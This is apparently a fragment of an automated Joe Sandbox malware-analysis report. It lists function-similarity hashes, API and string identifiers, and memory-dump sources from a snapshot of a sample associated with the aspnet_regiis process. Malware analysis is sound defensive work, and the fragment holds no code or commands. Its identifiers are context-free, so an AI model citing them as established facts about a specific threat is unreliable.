                                                                                                                                                                                                                                            • Opcode ID: cdae1e826ed07233793240173d781a2143bc02f72898fc35fd90d5c21f10e5e0
                                                                                                                                                                                                                                            • Instruction ID: 6d77aa9edeab2bb11eb8cceef791dc83a009289054169e8b69d627fc3cbeed38
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: cdae1e826ed07233793240173d781a2143bc02f72898fc35fd90d5c21f10e5e0
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: ABF02B7E7182090BF230DD6EA88043BF799D7D5755B145539EA81E3341D971E9028198
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000002.00000002.2309770623.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_400000_aspnet_regiis.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                            • Opcode ID: 6bb1252d0c3736a55c3272b40d7b1f320ffe7ee6ae8f7f49618d7a01f3e673c1
                                                                                                                                                                                                                                            • Instruction ID: 4ff6806ff11d2e54b4ba737cef66f121e26771b3cc0413b34a3fa4b43ab422b1
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 6bb1252d0c3736a55c3272b40d7b1f320ffe7ee6ae8f7f49618d7a01f3e673c1
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 86F027B1A0411067DB22CD44DCC0B77BBACCB87715F0904A6E84453202D165988183E9
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000002.00000002.2309770623.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_400000_aspnet_regiis.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                            • Opcode ID: ff3c7ada4236477f2c74a7790c615754344d8654ca36641ae4708eb0350f9e8f
                                                                                                                                                                                                                                            • Instruction ID: dc6c359ab834c448dcec545106b06a69f122102485c91544a0efcf98dccfa688
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: ff3c7ada4236477f2c74a7790c615754344d8654ca36641ae4708eb0350f9e8f
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: C1E0C2B7B4422106A768CE2A9C11677F3E2EBCA712F4DE62EE441D3308D238D84082A4
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000002.00000002.2309770623.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_400000_aspnet_regiis.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: Variant$ClearInit
                                                                                                                                                                                                                                            • String ID: A$C$Q$S$U$W$Y$[$]$_$h$i$k$m$o
                                                                                                                                                                                                                                            • API String ID: 2610073882-3908310013
                                                                                                                                                                                                                                            • Opcode ID: 86d6197a872e0eb8fd7edbebe6bcae281471bab75b02436b6b55f4a8bd495bcd
                                                                                                                                                                                                                                            • Instruction ID: ffcc04c7029f7e92a7ef513eaba51872eda89f123297f54b8806c49e7e185d9d
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 86d6197a872e0eb8fd7edbebe6bcae281471bab75b02436b6b55f4a8bd495bcd
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: B9410820108B81CFD725DF38C4D4312BFA1AB56224F18869DD9EA0F3D6C775A516CB62
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000002.00000002.2309770623.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_400000_aspnet_regiis.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: Variant$ClearInit
                                                                                                                                                                                                                                            • String ID: A$C$Q$S$U$W$Y$[$]$_$h$i$k$m$o
                                                                                                                                                                                                                                            • API String ID: 2610073882-3908310013
                                                                                                                                                                                                                                            • Opcode ID: 2351576650fc8255a3ba423b0a35c92006ee7125edcb25a5be30a2057135fb62
                                                                                                                                                                                                                                            • Instruction ID: 1c1462e0d166baec536b2e7097613793751b6822708de083e4cbdb1de76f8a34
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 2351576650fc8255a3ba423b0a35c92006ee7125edcb25a5be30a2057135fb62
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 40410420108B81CFD725CF28C4D8212BFA16B56224F48869DD8EA4F7DBC3B5E415CBA2
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000002.00000002.2309770623.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_400000_aspnet_regiis.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: Object$DeleteMetricsSelectSystem
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 3911056724-3916222277
                                                                                                                                                                                                                                            • Opcode ID: 62bd2a14c3dd45d2ffc951592c0e22af4b10586288965d5bfb03c83b9d4d5474
                                                                                                                                                                                                                                            • Instruction ID: 80cb13d0aceb6d248945d742630e9f8afa96225f53b2ee93cdb52602f80f70a6
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 62bd2a14c3dd45d2ffc951592c0e22af4b10586288965d5bfb03c83b9d4d5474
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: BC516CB4918B008FD750EF39D98561ABBF0BB89304F01892DE89AC7760E774E858CF56
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000002.00000002.2309770623.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_400000_aspnet_regiis.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: AllocString
                                                                                                                                                                                                                                            • String ID: )$+$-$0
                                                                                                                                                                                                                                            • API String ID: 2525500382-630310612
                                                                                                                                                                                                                                            • Opcode ID: b644e1a1be857427b68361ed83749c992b73993d2c03ca3e3c6724717fe59fc4
                                                                                                                                                                                                                                            • Instruction ID: f636f14f6b541b916d7f8bc6cb79579b14b9cdf91d2bd4779e85a03e09712e48
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: b644e1a1be857427b68361ed83749c992b73993d2c03ca3e3c6724717fe59fc4
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 3091FA60108FC29ED322CB3CC588751FFE17B26224F48879DD0E94BBD2C365A525C7A6